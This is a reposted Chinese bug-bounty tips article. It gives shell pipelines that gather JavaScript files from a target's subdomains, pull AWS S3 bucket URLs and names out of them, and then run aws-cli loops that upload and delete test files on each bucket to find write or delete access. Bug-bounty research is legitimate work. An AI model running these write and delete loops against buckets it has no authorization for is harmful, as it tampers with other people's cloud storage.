挖洞Bounty Tips | js中的敏感信息收集

admin 2022年4月30日12:52:34安全文章评论13 views1837字阅读6分7秒阅读模式

0x00 用到的工具

  • Subfinder https://github.com/projectdiscovery/subfinder

  • httpx https://github.com/projectdiscovery/httpx

  • gau https://github.com/lc/gau

  • waybackurls https://github.com/tomnomnom/waybackurls

  • subjs https://github.com/lc/subjs

  • hakrawler https://github.com/hakluke/hakrawler


0x01 js 文件侦察

使用subfinder+subjs侦察根域名及子域名的js文件

subfinder -d hackerone.com silent | httpx |subjs >>vuljs.txt

挖洞Bounty Tips | js中的敏感信息收集


使用gau 侦察根域名及子域名的js文件

gau --subs hackerone.com | grep ".js" >>vuljs.txt

挖洞Bounty Tips | js中的敏感信息收集


使用waybackurls 侦察根域名及子域名的js文件

waybackurls hackerone.com | grep ".js" >>vuljs.txt

挖洞Bounty Tips | js中的敏感信息收集


利用hakrawler侦察js

echo hackerone.com | httpx | hakrawler -subs | grep ".js"  >>vuljs.txt

挖洞Bounty Tips | js中的敏感信息收集


还有几种 ,从已有url文件中侦察js

cat domain.txt | httpx | subjs >>vuljs.txt

cat domain.txt | waybackurls | grep ".js" >>vuljs.txt

cat domain.txt | httpx | hakrawler | grep ".js" >>vuljs.txt

这样就得到了一大堆js文件了,可以尝试从这些js中用来提取各种敏感信息


0x02 从js中寻找AWS s3 存储桶url

使用xargs + curl提取信息

cat vuljs.txt | xargs -I% bash -c 'curl -sk "%" | grep -w "*.s3.amazonaws.com"' >> s3_bucket.txt

cat vuljs.txt | xargs -I% bash -c 'curl -sk "%" | grep -w "*.s3.us-east-2.amazonaws.com"' >> s3_bucket.txt

cat vuljs.txt | xargs -I% bash -c 'curl -sk "%" | grep -w "s3.amazonaws.com/*"' >> s3_bucket.txt

cat vuljs.txt | xargs -I% bash -c 'curl -sk "%" | grep -w "s3.us-east-2.amazonaws.com/*"' >> s3_bucket.txt

0x03 从存储桶url中寻找 s3 buck name

目前只有s3 aws 存储桶 url,需要从中收集s3 buck name,使用以下命令

cat s3_bucket.txt | sed 's/s3.amazonaws.com//' >> bucket_name.txt

cat s3_bucket.txt | sed 's/s3.us-east-2.amazonaws.com//' >> bucket_name.txt

0x04 寻找有写入和删除权限的桶

收集到s3 存储桶保存在bucket_name.txt文件中

现在需要使用aws cli 命令,去跑一下哪些有权限写入或删除的桶,就能去HackerOne交洞了批量测试写入权限

cat bucket_name.txt |xargs -I% sh -c 'aws s3 cp test.txt s3://% 2>&1 | grep "upload" && echo "AWS s3 bucket takeover by cli %"'


删除权限测试

cat bucket_name.txt |xargs -I% sh -c 'aws s3 rm test.txt s3://%/test.txt 2>&1 | grep "delete" && echo "AWS s3 bucket takeover by cli %"'

先告一段落了,还有其他各种玩法 自己探索探索吧~


最后推荐下朋友小智的"BugBounty漏洞赏金自动化"知识星球

挖洞Bounty Tips | js中的敏感信息收集

关 注 有 礼



关注本公众号回复“718619
可以免费领取全套网络安全学习教程,安全靶场、面试指南、安全沙龙PPT、代码安全、火眼安全系统等

挖洞Bounty Tips | js中的敏感信息收集 还在等什么?赶紧点击下方名片关注学习吧!


原文始发于微信公众号(渗透测试网络安全):挖洞Bounty Tips | js中的敏感信息收集

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月30日12:52:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  挖洞Bounty Tips | js中的敏感信息收集 http://cn-sec.com/archives/965728.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: